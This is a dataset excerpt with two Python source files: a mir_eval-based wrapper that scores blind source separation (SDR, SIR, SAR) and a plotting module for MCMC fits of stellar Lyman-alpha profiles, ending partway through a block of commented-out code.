content stringlengths 5 1.05M |
|---|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
"""
import numpy as np
import mir_eval
import bss_eval_base
class BSSEvalSources(bss_eval_base.BSSEvalBase):
    """Source-level BSS evaluation backed by ``mir_eval.separation.bss_eval_sources``.

    Thin subclass of :class:`bss_eval_base.BSSEvalBase` that selects the
    ``bss_eval_sources`` metric function and reshapes its raw output
    (SDR/SIR/SAR arrays plus the estimated-to-true permutation) into the
    nested per-source, per-channel ``scores`` dictionary.
    """

    def __init__(self, true_sources_list, estimated_sources_list, source_labels=None, algorithm_name=None,
                 do_mono=False, compute_permutation=True):
        """Forward construction to the base class and pick the mir_eval metric.

        Note: ``algorithm_name`` is accepted for interface compatibility but is
        not forwarded to the base class here.
        """
        super(BSSEvalSources, self).__init__(true_sources_list=true_sources_list,
                                             estimated_sources_list=estimated_sources_list,
                                             source_labels=source_labels, do_mono=do_mono,
                                             compute_permutation=compute_permutation)
        self._mir_eval_func = mir_eval.separation.bss_eval_sources

    def _preprocess_sources(self):
        """Run the base-class preprocessing, then mir_eval's input validation.

        Returns the (reference, estimated) arrays unchanged beyond what the
        base class already did. (A multichannel channel-summing step was
        previously here but is disabled pending review.)
        """
        reference, estimated = super(BSSEvalSources, self)._preprocess_sources()
        mir_eval.separation.validate(reference, estimated)
        return reference, estimated

    def _populate_scores_dict(self, bss_output):
        """Unpack mir_eval's output tuple into ``self.scores``.

        ``bss_output`` is (sdr, sir, sar, perm) with one entry per
        source/channel pair; ``perm`` maps each flat slot to the matching
        entry of the metric arrays.
        """
        sdr_list, sir_list, sar_list, perm = bss_output
        expected_len = len(self.true_sources_list) * self.num_channels
        assert len(sdr_list) == len(sir_list) == len(sar_list) == expected_len
        self.scores[self.RAW_VALUES] = {self.SDR: sdr_list, self.SIR: sir_list, self.SAR: sar_list,
                                        self.PERMUTATION: perm}
        for i, label in enumerate(self.source_labels):
            per_channel = {}
            for ch in range(self.num_channels):
                # Flat position of (source i, channel ch) in the metric arrays.
                flat = i * self.num_channels + ch
                per_channel['Ch {}'.format(ch)] = {
                    self.SDR: sdr_list[perm[flat]],
                    self.SIR: sir_list[perm[flat]],
                    self.SAR: sar_list[perm[flat]],
                }
            self.scores[label] = per_channel
        self.scores[self.PERMUTATION] = perm
|
import numpy as np
import matplotlib.pyplot as plt
from lyapy import lyapy
import corner as triangle
from matplotlib.ticker import NullFormatter,MultipleLocator, FormatStrFormatter, MaxNLocator
import time
from astropy.modeling.models import Voigt1D, Lorentz1D, Gaussian1D
from matplotlib import gridspec
plt.ion()
def walkers(sampler_chain, variables, param_order, burnin, subset=False):
    """Plot per-parameter MCMC walker traces, one panel per parameter.

    Parameters
    ----------
    sampler_chain : ndarray
        Sampler chain indexed as [walker, step, parameter] — assumed from the
        indexing below; TODO confirm against the emcee sampler used upstream.
    variables : dict
        Per-parameter metadata; only entries with ``['vary']`` True are
        plotted, and ``'texname'``, ``'value'`` and ``'scale'`` are read for
        the axis label and the burn-in marker extent.
    param_order : sequence
        Parameter names in the order they appear along the chain's last axis.
    burnin : int
        Step index marked with a vertical red line on each panel.
    subset : bool, optional
        If True, plot only 1000 evenly spaced steps (useful for long chains).
    """
    ndim = sampler_chain[0, 0, :].size
    fig, axes = plt.subplots(ndim, 1, sharex=True, figsize=(8, ndim))
    # Bug fix: with ndim == 1, plt.subplots returns a bare Axes (not an
    # array), so axes[i] below would fail. Normalize to a 1-D array.
    axes = np.atleast_1d(axes)
    ## this is for long chains, to plot only 1000 evenly sampled points
    if subset:
        toplot = np.array(np.linspace(0, len(sampler_chain[0, :, 0]) - 1, 1000), dtype=int)
    else:
        toplot = np.ones_like(sampler_chain[0, :, 0], dtype=bool)
    i = 0
    for p in param_order:
        if variables[p]['vary']:
            # NOTE(review): ndim counts all chain columns but i counts only
            # varied parameters — assumes every chain column is varied.
            axes[i].plot(sampler_chain[:, toplot, i].T, color="k", alpha=0.4)
            axes[i].yaxis.set_major_locator(MaxNLocator(5))
            axes[i].set_ylabel(variables[p]['texname'])
            # Mark the burn-in cutoff, spanning the parameter's prior scale.
            ymin = variables[p]['value'] - variables[p]['scale']
            ymax = variables[p]['value'] + variables[p]['scale']
            axes[i].vlines(burnin, ymin, ymax, color='r')
            i = i + 1
    if subset:
        # Typo fix: was "Coursely".
        plt.xlabel("Coarsely sampled step number")
    else:
        plt.xlabel("Step number")
    #outfile_str = spec_header['STAR'] + descrip + '_walkers.png'
    #plt.savefig(outfile_str)
def corner(samples, variables, param_order, quantiles=[0.16,0.5,0.84], truths=None, nbins=20,range=None):
    """Draw a corner (triangle) plot of the posterior samples.

    Labels come from each varied parameter's ``'texname'`` entry, taken in
    ``param_order``; the actual rendering is delegated to ``corner.corner``
    (imported here as ``triangle``). ``range`` intentionally mirrors the
    corner-package keyword even though it shadows the builtin.
    """
    # LaTeX labels for the varied parameters, in chain-column order.
    variable_names = [variables[p]['texname'] for p in param_order if variables[p]['vary']]
    ndim = len(variable_names)
    fig, axes = plt.subplots(ndim, ndim, figsize=(12.5, 9))
    triangle.corner(samples, bins=nbins, labels=variable_names,
                    max_n_ticks=3, plot_contours=True, quantiles=quantiles, fig=fig,
                    show_titles=True, verbose=True, truths=truths, range=range)
    #outfile_str = spec_header['STAR'] + descrip + '_cornerplot.png'
    #plt.savefig(outfile_str)
    # End triangle plot
def profile(wave_to_fit, flux_to_fit, error_to_fit, resolution,
            model_best_fit, lya_intrinsic_profile_mcmc, variables, param_order, samples = None,
            perform_error=True, Voigt=False, Lorentzian=False, nbins=100, thin_out = 1.0,
            fix_stellar_ISM_RV_diff=False):
    """Plot the Ly-alpha fit: data, best-fit model, posterior bands, residuals.

    Builds a three-panel figure (full-scale fit, zoomed fit, residuals) and,
    when ``perform_error`` is True and ``samples`` is supplied, rebuilds the
    model for every (thinned) posterior sample to draw 1/2-sigma percentile
    bands plus histogram figures of the reconstructed intrinsic Ly-alpha and
    Si III fluxes.

    Parameters
    ----------
    wave_to_fit, flux_to_fit, error_to_fit : array_like
        Observed wavelength grid, flux, and errors (equal length).
    resolution : array_like
        Instrument kernel used with ``np.convolve(..., mode='same')``.
    model_best_fit : array_like
        Best-fit model flux on ``wave_to_fit``.
    lya_intrinsic_profile_mcmc : array_like
        Best-fit intrinsic profile; integrated for the flux annotation.
    variables : dict
        Per-parameter metadata ('vary', 'value', 'best'/'mle_best', flags).
    param_order : sequence
        Parameter order matching the sample columns.
    samples : ndarray or None
        Posterior samples, presumably shape (nsamples, n_varied) — confirm.
    perform_error : bool
        Compute percentile bands / flux histograms and return the summaries.
    Voigt, Lorentzian : bool
        Select the intrinsic-profile parameterization (two-Gaussian vs
        Voigt/Lorentzian).
    nbins : int
        Histogram bin count.
    thin_out : float
        Keep every ``thin_out``-th sample. NOTE(review): if ``thin_out`` does
        not evenly divide ``len(samples)``, one extra sample is kept and the
        preallocated arrays overflow (IndexError) — confirm callers pass
        exact divisors.
    fix_stellar_ISM_RV_diff : bool
        If True, interpret the sampled H I velocity as an offset from the
        stellar velocity.

    Returns
    -------
    tuple or None
        (LyA_intr_fluxes, LyA_bestfit_models, SiIII_fluxes,
        LyA_intr_profiles, SiIII_profiles) when ``perform_error`` is True.
        NOTE(review): when ``samples`` is None, ``ndim`` is never assigned and
        the reduced-chi^2 computation below raises NameError.
    """
    f = plt.figure(figsize=(8,9))
    plt.rc('text', usetex=True)
    plt.rc('font', family='sans-serif', size=14)
    # Three stacked panels: full-scale fit (ax), zoom (axx), residuals (axxx).
    gs = gridspec.GridSpec(3, 1, height_ratios=[3, 3, 1])
    ax = plt.subplot(gs[0])
    axx = plt.subplot(gs[1])
    axxx = plt.subplot(gs[2])
    if samples is not None:
        ndim = len(samples[0])
        #print ndim
        if perform_error:
            # One row per retained (thinned) posterior sample.
            array_length = int(len(samples)/thin_out)
            model_fits = np.zeros((array_length,len(wave_to_fit)))
            intrinsic_profs = np.zeros((array_length,len(wave_to_fit)))
            SiIII_profs = np.zeros((array_length,len(wave_to_fit)))
            lnprobs = np.zeros(array_length)
            #for i, sample in enumerate(samples[np.random.randint(len(samples), size=10)]):
            i=-1
            for ll, sample in enumerate(samples):
                if (ll % thin_out) == 0:
                    i += 1
                    # Merge sampled (varied) and fixed parameter values,
                    # walking param_order; theta holds only the varied ones.
                    theta_all = []
                    theta = []
                    j = 0
                    for p in param_order:
                        if variables[p]['vary']:
                            theta_all.append(sample[j])
                            theta.append(sample[j])
                            j = j+1
                        else:
                            theta_all.append(variables[p]['value'])
                    if not Voigt:
                        # Two-Gaussian (narrow + broad [+ HAW]) parameterization.
                        vs_n_i, am_n_i, fw_n_i, vs_b_i, am_b_i, fw_b_i, h1_col_i, h1_b_i, \
                            h1_vel_i, d2h_i, vs_haw_i, am_haw_i, fw_haw_i, \
                            vs_SiIII_i, am_SiIII_i, fw_SiIII_i, ln_f_i = theta_all
                        singcomp = variables['am_b']['single_comp']
                        # (full damped_lya_profile call disabled in favor of the
                        # shortcut further below)
                        lya_intrinsic_profile = lyapy.lya_intrinsic_profile_func(wave_to_fit,
                                                    vs_n_i,10**am_n_i,fw_n_i,
                                                    vs_b_i,10**am_b_i,fw_b_i,
                                                    single_component_flux=singcomp)
                        if variables['vs_haw']['HAW']:
                            # Optional "high apparent wavelength" extra component.
                            haw_profile = lyapy.lya_intrinsic_profile_func(wave_to_fit,
                                                    vs_haw_i,
                                                    10**am_haw_i,
                                                    fw_haw_i,
                                                    single_component_flux=True)
                            lya_intrinsic_profile += haw_profile
                        intrinsic_profs[i,:] = lya_intrinsic_profile
                    else:
                        # Voigt (or Lorentzian) parameterization.
                        vs_i, am_i, fw_L_i, fw_G_i, h1_col_i, h1_b_i, h1_vel_i, d2h_i, vs_SiIII_i, am_SiIII_i, fw_SiIII_i,ln_f_i = theta_all
                        if fix_stellar_ISM_RV_diff:
                            # H I velocity sampled as an offset from stellar RV.
                            h1_vel_i = h1_vel_i + vs_i
                        # km/s -> Angstrom about Ly-alpha 1215.67 A.
                        line_center_i = vs_i/3e5*1215.67+1215.67
                        sigma_G_i = fw_G_i/3e5 * 1215.67 #/ 2.3548
                        if variables['fw_G']['fw_G_fw_L_fixed_ratio'] != 0:
                            # fw_L tied to fw_G: -1 means a sampled ratio fw_L_i,
                            # otherwise a fixed ratio from the config.
                            if variables['fw_G']['fw_G_fw_L_fixed_ratio'] == -1:
                                sigma_L_i = fw_G_i * fw_L_i /3e5 * 1215.67 / 2.
                            else:
                                sigma_L_i = fw_G_i * variables['fw_G']['fw_G_fw_L_fixed_ratio'] /3e5 * 1215.67 / 2.
                        else:
                            sigma_L_i = fw_L_i/3e5 * 1215.67 #/ 2.
                        if Lorentzian:
                            voigt_profile_func_i = Lorentz1D(x_0 = line_center_i, amplitude = 10**am_i,
                                                             fwhm = sigma_L_i)
                        else:
                            voigt_profile_func_i = Voigt1D(x_0 = line_center_i, amplitude_L = 10**am_i,
                                                           fwhm_L = sigma_L_i, fwhm_G = sigma_G_i)
                        lya_intrinsic_profile = voigt_profile_func_i(wave_to_fit)
                        intrinsic_profs[i,:] = np.convolve(lya_intrinsic_profile,resolution,mode='same')
                    if variables['vs_SiIII']['SiIII']:
                        # Optional Si III 1206.5 A contaminating line.
                        if variables['vs']['match_v_HI_SiIII']:
                            # NOTE(review): vs_i is only assigned in the Voigt
                            # branch above — this path looks unreachable/unsafe
                            # when Voigt is False; confirm intended usage.
                            SiIII_profile = lyapy.lya_intrinsic_profile_func(wave_to_fit,
                                                    vs_i,
                                                    10**am_SiIII_i,
                                                    fw_SiIII_i,
                                                    single_component_flux=True, line_center=1206.50)
                        else:
                            SiIII_profile = lyapy.lya_intrinsic_profile_func(wave_to_fit,
                                                    vs_SiIII_i,
                                                    10**am_SiIII_i,
                                                    fw_SiIII_i,
                                                    single_component_flux=True, line_center=1206.50)
                        lya_intrinsic_profile += SiIII_profile
                        SiIII_profs[i,:] = np.convolve(SiIII_profile,resolution,mode='same')
                    # Attenuate by the ISM H I + D I opacity and convolve down
                    # to the instrument resolution.
                    total_attenuation = lyapy.total_tau_profile_func(wave_to_fit,
                                            h1_col_i,h1_b_i,h1_vel_i,d2h_i)
                    model_fit = lyapy.damped_lya_profile_shortcut(wave_to_fit,resolution,
                                    lya_intrinsic_profile, total_attenuation)/1e14
                    model_fits[i,:] = model_fit
                    # NOTE(review): lnprob_voigt is evaluated for both the
                    # Voigt and two-Gaussian branches — confirm it is valid
                    # for the latter.
                    lnprobs[i] = lyapy.lnprob_voigt(theta,wave_to_fit,flux_to_fit,error_to_fit,variables)
            # Currently only used by the disabled max-probability overplots below.
            max_lnprob_index = np.where(lnprobs == np.max(lnprobs))
            # Per-wavelength 2-sigma/1-sigma/median summaries of the model,
            # intrinsic profile, and Si III profile ensembles.
            sig2_low = np.zeros_like(wave_to_fit)
            sig1_low = np.zeros_like(wave_to_fit)
            median = np.zeros_like(wave_to_fit)
            sig1_high = np.zeros_like(wave_to_fit)
            sig2_high = np.zeros_like(wave_to_fit)
            sig2_low_intr_prof = np.zeros_like(wave_to_fit)
            sig1_low_intr_prof = np.zeros_like(wave_to_fit)
            median_intr_prof = np.zeros_like(wave_to_fit)
            sig1_high_intr_prof = np.zeros_like(wave_to_fit)
            sig2_high_intr_prof = np.zeros_like(wave_to_fit)
            sig2_low_SiIII_prof = np.zeros_like(wave_to_fit)
            sig1_low_SiIII_prof = np.zeros_like(wave_to_fit)
            median_SiIII_prof = np.zeros_like(wave_to_fit)
            sig1_high_SiIII_prof = np.zeros_like(wave_to_fit)
            sig2_high_SiIII_prof = np.zeros_like(wave_to_fit)
            for i in np.arange(len(wave_to_fit)):
                sig2_low[i], sig1_low[i], median[i], sig1_high[i], sig2_high[i] = \
                    np.percentile(model_fits[:,i], [2.5,15.9,50,84.1,97.5])
                sig2_low_intr_prof[i], sig1_low_intr_prof[i], median_intr_prof[i], sig1_high_intr_prof[i], sig2_high_intr_prof[i] = \
                    np.percentile(intrinsic_profs[:,i], [2.5,15.9,50,84.1,97.5])
                sig2_low_SiIII_prof[i], sig1_low_SiIII_prof[i], median_SiIII_prof[i], sig1_high_SiIII_prof[i], sig2_high_SiIII_prof[i] = \
                    np.percentile(SiIII_profs[:,i], [2.5,15.9,50,84.1,97.5])
            # Shade the 2-sigma (light) and 1-sigma (dark) bands on both fit panels.
            ax.fill_between(wave_to_fit, sig2_low, sig2_high, color='lightgrey')
            axx.fill_between(wave_to_fit, sig2_low, sig2_high, color='lightgrey')
            ax.fill_between(wave_to_fit, sig1_low, sig1_high, color='grey')
            axx.fill_between(wave_to_fit, sig1_low, sig1_high, color='grey')
            ax.fill_between(wave_to_fit, sig2_low_intr_prof, sig2_high_intr_prof, color='lavenderblush')
            axx.fill_between(wave_to_fit, sig2_low_intr_prof, sig2_high_intr_prof, color='lavenderblush')
            ax.fill_between(wave_to_fit, sig1_low_intr_prof, sig1_high_intr_prof, color='lightpink')
            axx.fill_between(wave_to_fit, sig1_low_intr_prof, sig1_high_intr_prof, color='lightpink')
            # Integrated fluxes per sample for the histogram figures.
            reconstructed_flux = np.zeros(len(intrinsic_profs))
            SiIII_flux = np.zeros(len(intrinsic_profs))
            for i,prof in enumerate(intrinsic_profs):
                reconstructed_flux[i] = np.trapz(prof,wave_to_fit)
                SiIII_flux[i] = np.trapz(SiIII_profs[i],wave_to_fit)
            sig2_low_intr, sig1_low_intr, median_intr, sig1_high_intr, sig2_high_intr = \
                np.percentile(reconstructed_flux, [2.5,15.9,50,84.1,97.5])
            sig2_low_SiIII, sig1_low_SiIII, median_SiIII, sig1_high_SiIII, sig2_high_SiIII = \
                np.percentile(SiIII_flux, [2.5,15.9,50,84.1,97.5])
            # Histogram of reconstructed intrinsic Ly-alpha fluxes (new figure).
            f2 = plt.figure()
            ax2 = f2.add_subplot(1,1,1)
            n,bins,patches=ax2.hist(reconstructed_flux,bins=nbins)
            ax2.vlines(sig2_low_intr,0,1.1*np.max(n),color='k',linestyle='--')
            ax2.vlines(sig1_low_intr,0,1.1*np.max(n),linestyle='--',color='grey')
            ax2.vlines(sig2_high_intr,0,1.1*np.max(n),color='k',linestyle='--')
            ax2.vlines(sig1_high_intr,0,1.1*np.max(n),linestyle='--',color='grey')
            ax2.set_xlabel('Ly$\\alpha$ flux (erg cm$^{-2}$ s$^{-1}$)')
            ax2.minorticks_on()
            best_fit_flux = np.trapz(lya_intrinsic_profile_mcmc,wave_to_fit)
            ax2.vlines(best_fit_flux,0,1.1*np.max(n),color='r')
            # Format flux as mantissa x 10^exponent for the annotation.
            lya_intrinsic_flux_argument = float(("%e" % best_fit_flux).split('e')[0])
            lya_intrinsic_flux_exponent = float(("%e" % best_fit_flux).split('e')[1])
            ax2.text(0.55,0.98,r'Ly$\alpha$ flux= ('+ str(round(lya_intrinsic_flux_argument,2)) + \
                '$^{+' + str(round((sig2_high_intr-best_fit_flux)/10**lya_intrinsic_flux_exponent,2)) + \
                '}_{-' + str(round((best_fit_flux-sig2_low_intr)/10**lya_intrinsic_flux_exponent,2)) + \
                '}$) ' + r'$\times$'+ ' 10$^{' + str(int(lya_intrinsic_flux_exponent)) + '}$',
                verticalalignment='top',horizontalalignment='left',
                transform=ax2.transAxes,fontsize=12., color='black')
            ax2.text(0.97,0.93,r'erg cm$^{-2}$ s$^{-1}$',verticalalignment='top',horizontalalignment='right',
                transform=ax2.transAxes,fontsize=12., color='black')
            # Histogram of Si III fluxes (another new figure).
            f3 = plt.figure()
            ax3 = f3.add_subplot(1,1,1)
            n,bins,patches=ax3.hist(SiIII_flux,bins=nbins)
            ax3.vlines(sig2_low_SiIII,0,1.1*np.max(n),color='k',linestyle='--')
            ax3.vlines(sig2_high_SiIII,0,1.1*np.max(n),color='k',linestyle='--')
            ax3.set_xlabel('Si III flux (erg cm$^{-2}$ s$^{-1}$)')
            ax3.minorticks_on()
            ax3.set_title(str(sig2_low_SiIII) + ', ' + str(sig1_low_SiIII) + ', ' + str(median_SiIII) + ', ' + str(sig1_high_SiIII) + ', ' + str(sig2_high_SiIII))
    # Data and best-fit model on both fit panels.
    ax.step(wave_to_fit,flux_to_fit,'k',where='mid')
    axx.step(wave_to_fit,flux_to_fit,'k',where='mid')
    # Plot error bars on every 5th point only, to avoid clutter.
    mask=[]
    for i in range(len(wave_to_fit)):
        if (i%5 == 0):
            mask.append(i)
    short_wave = wave_to_fit[mask]
    error_bars_short = error_to_fit[mask]
    short_flux = flux_to_fit[mask]
    ax.errorbar(short_wave,short_flux,yerr=error_bars_short,
                fmt="none",ecolor='limegreen',elinewidth=3,capthick=3)
    ax.plot(wave_to_fit,model_best_fit,'deeppink',linewidth=1.5)
    axx.errorbar(short_wave,short_flux,yerr=error_bars_short,
                 fmt="none",ecolor='limegreen',elinewidth=3,capthick=3)
    axx.plot(wave_to_fit,model_best_fit,'deeppink',linewidth=1.5)
    # Best-fit intrinsic profile and its individual components.
    if not Voigt:
        narrow_component = lyapy.lya_intrinsic_profile_func(wave_to_fit,
                                variables['vs_n']['best'][0],
                                10**variables['am_n']['best'][0],
                                variables['fw_n']['best'][0],
                                single_component_flux=True)
        if not variables['am_b']['single_comp']:
            broad_component = lyapy.lya_intrinsic_profile_func(wave_to_fit,
                                    variables['vs_b']['best'][0],
                                    10**variables['am_b']['best'][0],
                                    variables['fw_b']['best'][0],
                                    single_component_flux=True)
            lya_intrinsic_profile_bestfit = narrow_component + broad_component
        else:
            lya_intrinsic_profile_bestfit = narrow_component
        if variables['vs_haw']['HAW']:
            haw_component = lyapy.lya_intrinsic_profile_func(wave_to_fit,
                                variables['vs_haw']['best'][0],
                                10**variables['am_haw']['best'][0],
                                variables['fw_haw']['best'][0],
                                single_component_flux=True)
            lya_intrinsic_profile_bestfit += haw_component
        narrow_component_convolved = np.convolve(narrow_component,resolution,mode='same')
        ax.plot(wave_to_fit,narrow_component_convolved,'r:',linewidth=0.7)
        axx.plot(wave_to_fit,narrow_component_convolved,'r:',linewidth=0.7)
        if not variables['am_b']['single_comp']:
            broad_component_convolved = np.convolve(broad_component,resolution,mode='same')
            ax.plot(wave_to_fit,broad_component_convolved,'g:',linewidth=0.7)
            axx.plot(wave_to_fit,broad_component_convolved,'g:',linewidth=0.7)
        if variables['vs_haw']['HAW']:
            haw_component_convolved = np.convolve(haw_component,resolution,mode='same')
            ax.plot(wave_to_fit,haw_component_convolved,'c:',linewidth=0.7)
            axx.plot(wave_to_fit,haw_component_convolved,'c:',linewidth=0.7)
    else:
        # Best-fit (MLE) Voigt/Lorentzian intrinsic profile.
        line_center_mle = variables['vs']['mle_best']/3e5*1215.67+1215.67
        sigma_G_mle = variables['fw_G']['mle_best']/3e5 * 1215.67 #/ 2.3548
        if variables['fw_G']['fw_G_fw_L_fixed_ratio'] != 0:
            if variables['fw_G']['fw_G_fw_L_fixed_ratio'] == -1:
                sigma_L_mle = variables['fw_G']['mle_best'] * variables['fw_L']['mle_best'] /3e5 * 1215.67 / 2.
            else:
                sigma_L_mle = variables['fw_G']['mle_best'] * variables['fw_G']['fw_G_fw_L_fixed_ratio'] /3e5 * 1215.67 / 2.
        else:
            sigma_L_mle = variables['fw_L']['mle_best']/3e5 * 1215.67 #/ 2.
        if Lorentzian:
            voigt_profile_func_mle = Lorentz1D(x_0 = line_center_mle, amplitude = 10**variables['am']['mle_best'],
                                               fwhm = sigma_L_mle)
        else:
            voigt_profile_func_mle = Voigt1D(x_0 = line_center_mle, amplitude_L = 10**variables['am']['mle_best'],
                                             fwhm_L = sigma_L_mle, fwhm_G = sigma_G_mle)
        lya_intrinsic_profile_bestfit = voigt_profile_func_mle(wave_to_fit)
    # Best-effort Si III component: the bare except tolerates configs where
    # the SiIII/mle_best keys are absent.
    try:
        if variables['vs_SiIII']['SiIII']:
            if variables['vs']['match_v_HI_SiIII']:
                SiIII_component = lyapy.lya_intrinsic_profile_func(wave_to_fit,
                                        variables['vs']['mle_best'],
                                        10**variables['am_SiIII']['mle_best'],
                                        variables['fw_SiIII']['mle_best'],
                                        single_component_flux=True, line_center=1206.50)
            else:
                SiIII_component = lyapy.lya_intrinsic_profile_func(wave_to_fit,
                                        variables['vs_SiIII']['mle_best'],
                                        10**variables['am_SiIII']['mle_best'],
                                        variables['fw_SiIII']['mle_best'],
                                        single_component_flux=True, line_center=1206.50)
    except:
        pass
    lya_intrinsic_profile_bestfit_convolved = np.convolve(lya_intrinsic_profile_bestfit,resolution,mode='same')
    ax.plot(wave_to_fit,lya_intrinsic_profile_bestfit_convolved,'b--',linewidth=1.3)
    axx.plot(wave_to_fit,lya_intrinsic_profile_bestfit_convolved,'b--',linewidth=1.3)
    # Same best-effort pattern: SiIII_component may be undefined above.
    try:
        if variables['vs_SiIII']['SiIII']:
            SiIII_component_convolved = np.convolve(SiIII_component,resolution,mode='same')
            ax.plot(wave_to_fit,SiIII_component_convolved,'k:',linewidth=0.7)
            axx.plot(wave_to_fit,SiIII_component_convolved,'k:',linewidth=0.7)
    except:
        pass
    # Axis cosmetics: full-scale panel scaled to the intrinsic profile, zoom
    # panel to 10% of the data peak.
    ax.set_ylabel(r'Flux ' r'(erg s$^{-1}$ cm$^{-2}$ \AA$^{-1}$)',fontsize=14)
    ax.minorticks_on()
    axx.set_ylabel(r'Flux ' r'(erg s$^{-1}$ cm$^{-2}$ \AA$^{-1}$)',fontsize=14)
    axx.minorticks_on()
    ax.set_ylim([-np.max(flux_to_fit)/10.,np.max(lya_intrinsic_profile_bestfit_convolved)*1.1])
    axx.set_ylim([-np.max(flux_to_fit)/100.,np.max(flux_to_fit)*0.1])
    plt.ticklabel_format(useOffset=False)
    # Residuals panel with reduced chi^2 annotation.
    # NOTE(review): ndim is only defined when samples is not None.
    residuals = (flux_to_fit - model_best_fit) / error_to_fit
    chi2 = np.sum( residuals**2 )
    dof = len(flux_to_fit) - ndim - 1
    axxx.plot(wave_to_fit,residuals,'ko')
    axxx.set_xlabel(r'Wavelength (\AA)',fontsize=14)
    axxx.set_ylabel('Residuals',fontsize=14)
    axxx.minorticks_on()
    axxx.hlines(0,np.min(wave_to_fit),np.max(wave_to_fit),linestyle='--',color='grey')
    axxx.hlines(1,np.min(wave_to_fit),np.max(wave_to_fit),linestyle=':',color='grey')
    axxx.hlines(-1,np.min(wave_to_fit),np.max(wave_to_fit),linestyle=':',color='grey')
    axxx.text(0.03,0.2,'$\\chi_{\\nu}^2$ = ' + str(round(chi2/dof,2)),verticalalignment='top',
              horizontalalignment='left',transform=axxx.transAxes,fontsize=12., color='black')
    if perform_error:
        # Bundle the percentile summaries for the caller.
        LyA_intr_fluxes = np.transpose(np.array([sig2_low_intr, sig1_low_intr, median_intr, sig1_high_intr, sig2_high_intr]))
        LyA_bestfit_models = np.transpose(np.array([sig2_low, sig1_low, median, sig1_high, sig2_high]))
        SiIII_fluxes = np.transpose([sig2_low_SiIII, sig1_low_SiIII, median_SiIII, sig1_high_SiIII, sig2_high_SiIII])
        LyA_intr_profiles = np.transpose(np.array([sig2_low_intr_prof, sig1_low_intr_prof, median_intr_prof, sig1_high_intr_prof, sig2_high_intr_prof]))
        SiIII_profiles = np.transpose(np.array([sig2_low_SiIII_prof, sig1_low_SiIII_prof, median_SiIII_prof, sig1_high_SiIII_prof, sig2_high_SiIII_prof]))
        return LyA_intr_fluxes, LyA_bestfit_models, SiIII_fluxes, LyA_intr_profiles, SiIII_profiles
# am_n_mcmc_float_str = "{0:.2g}".format(10**am_n_mcmc[0])
# base, exponent = am_n_mcmc_float_str.split("e")
# am_n_exponent = float('1e'+exponent)
# # Inserting text
# ax.text(0.03,0.97,'V$_n$ = ' + str(round(vs_n_mcmc[0],1)) + '$^{+' + str(round(vs_n_mcmc[1],1)) + '}_{-' + str(round(vs_n_mcmc[2],1)) + '}$',
# verticalalignment='top',horizontalalignment='left',transform=ax.transAxes,
# fontsize=12., color='black')
# am_n_p = (10**(am_n_mcmc[0] + am_n_mcmc[1])-10**am_n_mcmc[0])/am_n_exponent
# am_n_m = (10**am_n_mcmc[0]-10**(am_n_mcmc[0] - am_n_mcmc[2]))/am_n_exponent
# ax.text(0.03,0.91,'A$_n$ = ('+ str(round(10**am_n_mcmc[0]/am_n_exponent,1)) + '$^{+' + str(round(am_n_p,1)) + '}_{-' + str(round(am_n_m,1)) + '}$) ' + r'$\times$'+ ' 10$^{' + str(exponent) + '}$',
#verticalalignment='top',horizontalalignment='left',
# transform=ax.transAxes,fontsize=12., color='black')
#
#
# ax.text(0.03,0.85,'FW$_n$ = '+ str(round(fw_n_mcmc[0],1)) + '$^{+' + str(round(fw_n_mcmc[1],1)) + '}_{-' + str(round(fw_n_mcmc[2],1)) + '}$',
# verticalalignment='top',horizontalalignment='left',transform=ax.transAxes,fontsize=12.,
# color='black')
# ax.text(0.03,0.79,'V$_b$ = '+ str(round(vs_b_mcmc[0],1)) + '$^{+' + str(round(vs_b_mcmc[1],1)) + '}_{-' + str(round(vs_b_mcmc[2],1)) + '}$',
# verticalalignment='top',horizontalalignment='left',transform=ax.transAxes,fontsize=12.,
# color='black')
#
# am_b_p = (10**(am_b_mcmc[0] + am_b_mcmc[1])-10**am_b_mcmc[0])/am_n_exponent
# am_b_m = (10**am_b_mcmc[0]-10**(am_b_mcmc[0] - am_b_mcmc[2]))/am_n_exponent
# ax.text(0.03,0.73,'A$_b$ = ('+ str(round(10**am_b_mcmc[0]/am_n_exponent,2)) + '$^{+' + str(round(am_b_p,2)) + '}_{-' + str(round(am_b_m,2)) + '}$) ' + r'$\times$'+ ' 10$^{' + str(exponent) + '}$',
#verticalalignment='top',horizontalalignment='left',
# transform=ax.transAxes,fontsize=12., color='black')
#
# ax.text(0.03,0.67,'FW$_b$ = '+ str(round(fw_b_mcmc[0],1)) + '$^{+' + str(round(fw_b_mcmc[1],0)) + '}_{-' + str(round(fw_b_mcmc[2],0)) + '}$',
# verticalalignment='top',horizontalalignment='left',transform=ax.transAxes,fontsize=12.,
# color='black')
# ax.text(0.03,0.61,'log N(HI) = '+ str(round(h1_col_mcmc[0],2)) + '$^{+' + str(round(h1_col_mcmc[1],2)) + '}_{-' + str(round(h1_col_mcmc[2],2)) + '}$',
# verticalalignment='top',horizontalalignment='left',
# transform=ax.transAxes,fontsize=12., color='black')
# ax.text(0.03,0.55,'b = '+ str(round(h1_b_mcmc[0],1)) + '$^{+' + str(round(h1_b_mcmc[1],1)) + '}_{-' + str(round(h1_b_mcmc[2],1)) + '}$',
# verticalalignment='top',horizontalalignment='left',transform=ax.transAxes,fontsize=12.,
# color='black')
# ax.text(0.03,0.49,'V$_{HI}$ = '+ str(round(h1_vel_mcmc[0],1)) + '$^{+' + str(round(h1_vel_mcmc[1],1)) + '}_{-' + str(round(h1_vel_mcmc[2],1)) + '}$',verticalalignment='top',horizontalalignment='left',
# transform=ax.transAxes,fontsize=12., color='black')
# ax.text(0.03,0.43,r'D/H = 1.5$\times$10$^{-5}$',verticalalignment='top',horizontalalignment='left',
# transform=ax.transAxes,fontsize=12., color='black')
#
#
# lya_intrinsic_flux_argument = float(("%e" % lya_intrinsic_flux_mcmc).split('e')[0])
# lya_intrinsic_flux_exponent = float(("%e" % lya_intrinsic_flux_mcmc).split('e')[1])
# ax.text(0.65,0.98,r'Ly$\alpha$ flux= ('+ str(round(lya_intrinsic_flux_argument,2)) + '$^{+' + str(round(lya_intrinsic_flux_max_error/10**lya_intrinsic_flux_exponent,2)) + '}_{-' + str(round(lya_intrinsic_flux_min_error/10**lya_intrinsic_flux_exponent,2)) + '}$) ' + r'$\times$'+ ' 10$^{' + str(int(lya_intrinsic_flux_exponent)) + '}$',
# verticalalignment='top',horizontalalignment='left',
# transform=ax.transAxes,fontsize=12., color='black')
# ax.text(0.97,0.93,r'erg s$^{-1}$ cm$^{-2}$',verticalalignment='top',horizontalalignment='right',
